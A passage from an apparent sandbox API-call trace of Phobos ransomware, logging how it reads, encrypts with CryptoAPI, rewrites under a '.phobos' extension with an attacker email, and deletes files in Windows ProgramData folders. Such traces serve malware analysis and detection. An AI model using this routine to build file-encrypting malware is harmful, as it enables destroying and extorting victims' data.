phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.582] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5600, lpOverlapped=0x0) returned 1 [0147.720] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5610, dwBufLen=0x5610 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5610) returned 1 [0147.720] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5610, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5610, lpOverlapped=0x0) returned 1 [0147.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0147.721] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.721] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0147.721] CryptDestroyKey (hKey=0xa32968) returned 1 [0147.721] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0147.721] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.721] CloseHandle (hObject=0x138) returned 1 [0147.722] CloseHandle (hObject=0x18c) returned 1 [0147.722] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-2017-07-26.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-2017-07-26.xml")) returned 1 [0147.723] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.723] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.725] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=22016) returned 1 [0147.725] CloseHandle (hObject=0x18c) returned 1 [0147.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml")) returned 0x20 [0147.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.725] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.725] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.725] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.725] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.725] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.725] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5600, lpOverlapped=0x0) returned 1 [0147.732] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5610, dwBufLen=0x5610 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5610) returned 1 [0147.733] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5610, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5610, lpOverlapped=0x0) returned 1 [0147.734] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.734] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.734] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0147.734] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.734] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0147.734] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.734] CloseHandle (hObject=0x18c) returned 1 [0147.734] CloseHandle (hObject=0x138) returned 1 [0147.735] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report-latest.xml" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-report-latest.xml")) returned 1 [0147.736] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.736] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.737] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=612) returned 1 [0147.737] CloseHandle (hObject=0x138) returned 1 [0147.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini")) returned 0x26 [0147.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.737] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.737] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.737] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.737] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.738] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.738] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.738] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x264, lpOverlapped=0x0) returned 1 [0147.738] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270, dwBufLen=0x270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x270) returned 1 [0147.739] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x270, lpOverlapped=0x0) returned 1 [0147.739] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.739] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.739] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.739] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.739] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.739] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.739] CloseHandle (hObject=0x138) returned 1 [0147.740] CloseHandle (hObject=0x18c) returned 1 [0147.740] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\desktop.ini")) returned 1 [0147.741] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.741] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.742] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=442) returned 1 [0147.742] CloseHandle (hObject=0x18c) returned 1 [0147.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini")) returned 0x26 [0147.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.742] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.742] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.743] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.744] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.744] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1ba, lpOverlapped=0x0) returned 1 [0147.744] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0, dwBufLen=0x1c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1c0) returned 1 [0147.744] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1c0, lpOverlapped=0x0) returned 1 [0147.745] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.746] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.746] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.746] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.746] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.746] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.746] CloseHandle (hObject=0x18c) returned 1 [0147.746] CloseHandle (hObject=0x138) returned 1 [0147.748] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\desktop.ini")) returned 1 [0147.749] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.749] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.749] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=370) returned 1 [0147.750] CloseHandle (hObject=0x138) returned 1 [0147.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 0x26 [0147.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.750] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.750] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.752] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.752] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.752] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x172, lpOverlapped=0x0) returned 1 [0147.753] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180, dwBufLen=0x180 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x180) returned 1 [0147.753] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x180, lpOverlapped=0x0) returned 1 [0147.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.754] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.754] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.754] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.754] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.754] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.754] CloseHandle (hObject=0x138) returned 1 [0147.754] CloseHandle (hObject=0x18c) returned 1 [0147.755] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\desktop.ini")) returned 1 [0147.757] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.757] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1854) returned 1 [0147.757] CloseHandle (hObject=0x18c) returned 1 [0147.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 0x26 [0147.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0147.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0147.757] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.757] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0147.757] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0147.759] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.759] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x73e, lpOverlapped=0x0) returned 1 [0147.759] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740, dwBufLen=0x740 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x740) returned 1 [0147.759] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x740, lpOverlapped=0x0) returned 1 [0147.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0147.760] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0147.760] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0147.760] CryptDestroyKey (hKey=0xa32d28) returned 1 [0147.760] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0147.760] CryptDestroyKey (hKey=0xa32d68) returned 1 [0147.760] CloseHandle (hObject=0x18c) returned 1 [0147.760] CloseHandle (hObject=0x138) returned 1 [0147.761] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\desktop.ini")) returned 1 [0147.762] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0147.762] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 